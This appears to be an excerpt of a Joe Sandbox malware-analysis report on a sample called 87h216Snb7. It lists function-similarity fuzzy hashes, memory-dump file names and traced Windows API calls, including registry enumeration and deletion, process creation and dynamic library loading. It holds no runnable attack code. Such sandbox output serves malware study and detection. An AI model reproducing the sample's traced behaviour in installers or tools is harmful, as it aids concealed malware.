                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                                                                                                                            • Instruction ID: 6b1c66eb9f97b1ade68f1d395623a9ed29f1776dbc94043a645b3c6b65beda35
                                                                                                                                                            • Opcode Fuzzy Hash: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                                                                                                                            • Instruction Fuzzy Hash: C5912270E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                                                                                                                            • Instruction ID: ce41943af36f178b06a8ef9aeec7331a28cc36c4f565c07526a7a1ecbc0683f6
                                                                                                                                                            • Opcode Fuzzy Hash: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                                                                                                                            • Instruction Fuzzy Hash: 8C813571E04228CFDF24CFA8C844BADBBB1FB45305F24816AD456BB281D778A986DF45
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                                                                                                                            • Instruction ID: 8f4657df29e0a6c4f41eae1c6e560b42ebe12933d6c33c39fa024371cffe791d
                                                                                                                                                            • Opcode Fuzzy Hash: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                                                                                                                            • Instruction Fuzzy Hash: F4815771E04228DBDF24CFA8C8447ADBBB1FF44315F10816AD856BB281D7786986DF45
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                                                                                                                            • Instruction ID: 467485e0bb60f7ca81b57cb4e762169b1f98b62e9d0b722d18e83a7fcf81438f
                                                                                                                                                            • Opcode Fuzzy Hash: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                                                                                                                            • Instruction Fuzzy Hash: 04711375E04228CBDF24CFA8C844BADBBF1FB48305F15806AD856B7281D778A986DF45
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                                                                                                                            • Instruction ID: 8594309fab6a939f8579025671b20e25c27ad2f20b93bd04310bc8f9388019e2
                                                                                                                                                            • Opcode Fuzzy Hash: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                                                                                                                            • Instruction Fuzzy Hash: A6713471E04228CBDF28CF98C844BADBBB1FF45305F14806AD816BB281D778A986DF45
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                                                                                                                            • Instruction ID: 804367245b599a5d262e6525417658d62bb0317a144133a249ff79fbb491f744
                                                                                                                                                            • Opcode Fuzzy Hash: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                                                                                                                            • Instruction Fuzzy Hash: 04712571E04228CBDF28CF98C854BADBBB1FF44305F15806AD856B7281C778A986DF45
                                                                                                                                                            APIs
                                                                                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025F6
                                                                                                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 00402622
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Enum$CloseValue
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 397863658-0
                                                                                                                                                            • Opcode ID: 8d5b146921c23c5c32305bf675c8714087916087c3c12a48a2612aa1a4d71ea8
                                                                                                                                                            • Instruction ID: c62eb347aa92c0fd77e7ee5b530510020135478b5af5e66508d185aa27a1e92b
                                                                                                                                                            • Opcode Fuzzy Hash: 8d5b146921c23c5c32305bf675c8714087916087c3c12a48a2612aa1a4d71ea8
                                                                                                                                                            • Instruction Fuzzy Hash: BE01BC71A04205BBEB149F94DE48AAFB668EF80308F10443EF001B21D0D7B84E41976D
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                                                                                                                              • Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                                                                                                            • GetFileVersionInfoSizeW.KERNELBASE(0000000B,00000000,?,000000EE), ref: 00402065
                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00402084
                                                                                                                                                              • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2520467145-0
                                                                                                                                                            • Opcode ID: 151af76542c190628ef2acf394a4985ed8648910b70884bb67486c00b137938c
                                                                                                                                                            • Instruction ID: 28cb58910f6a4acfd0ff51bb22372a53c51a3c4cd31b2d17a05334ea7d98b38a
                                                                                                                                                            • Opcode Fuzzy Hash: 151af76542c190628ef2acf394a4985ed8648910b70884bb67486c00b137938c
                                                                                                                                                            • Instruction Fuzzy Hash: 9E210871A00218AFDB10DFE9C985AEEBBB4EF08344F51402AFA05B62E0D7759E51DB64
                                                                                                                                                            APIs
                                                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 00402622
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3356406503-0
                                                                                                                                                            • Opcode ID: 77a5136ceac10c13572c025ea85aaea8472d44a7460d1c056a70da611617ceba
                                                                                                                                                            • Instruction ID: d59507dec88f13297dcb42e268b6e0170753ff524d958fced3891ef78adf3038
                                                                                                                                                            • Opcode Fuzzy Hash: 77a5136ceac10c13572c025ea85aaea8472d44a7460d1c056a70da611617ceba
                                                                                                                                                            • Instruction Fuzzy Hash: 8F118C71904216EADF15DFA0CA589AEB7B4FF04348F20443FE806B62D0D3B84A45DB9D
                                                                                                                                                            APIs
                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                            • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                            • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                                                                                            • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                                                                                                                                            • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                                                                                            • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                                                                                                                                            APIs
                                                                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040247B
                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402484
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseDeleteValue
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2831762973-0
                                                                                                                                                            • Opcode ID: eee6be69eae89fba413121a175eacf98509731d8aa1df2795f329d1288486e8c
                                                                                                                                                            • Instruction ID: 8adcbc206ff712accdb54216371371453b286a19eaa2ac3ec43ed269339827cd
                                                                                                                                                            • Opcode Fuzzy Hash: eee6be69eae89fba413121a175eacf98509731d8aa1df2795f329d1288486e8c
                                                                                                                                                            • Instruction Fuzzy Hash: 48F09C32A04521ABDB10BBA9DB8D5EE7265AB44354F11443FF502B71C1CAFC4D02977D
                                                                                                                                                            APIs
                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004056A9
                                                                                                                                                              • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                                                                                                            • CoUninitialize.COMBASE(00000404,00000000), ref: 004056F5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeMessageSendUninitialize
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2896919175-0
                                                                                                                                                            • Opcode ID: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                                                                                                                            • Instruction ID: b888f1dcde8397bdf9a4ac710541df7d57aeeece4d3a8f29a6716c55d94af5f1
                                                                                                                                                            • Opcode Fuzzy Hash: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                                                                                                                            • Instruction Fuzzy Hash: 0AF0B4776007409BE7115B54AE05B5B77B0EB90354F85483AEF8D726F1C7764C028B5D
                                                                                                                                                            APIs
                                                                                                                                                            • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3712363035-0
                                                                                                                                                            • Opcode ID: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                                                                                                                            • Instruction ID: 3e6b85693243cf5959e47e0a5ce0ecee53803ede082a99688cf67a66356fc275
                                                                                                                                                            • Opcode Fuzzy Hash: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                                                                                                                            • Instruction Fuzzy Hash: 3AE0BFB4A10219BFFB10AB64ED05F7B77BCF704604F418825BD10F2551D774A9148A7C
                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                                                                                                              • Part of subcall function 004068C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                                                                                                                              • Part of subcall function 004068C5: wsprintfW.USER32 ref: 00406917
                                                                                                                                                              • Part of subcall function 004068C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
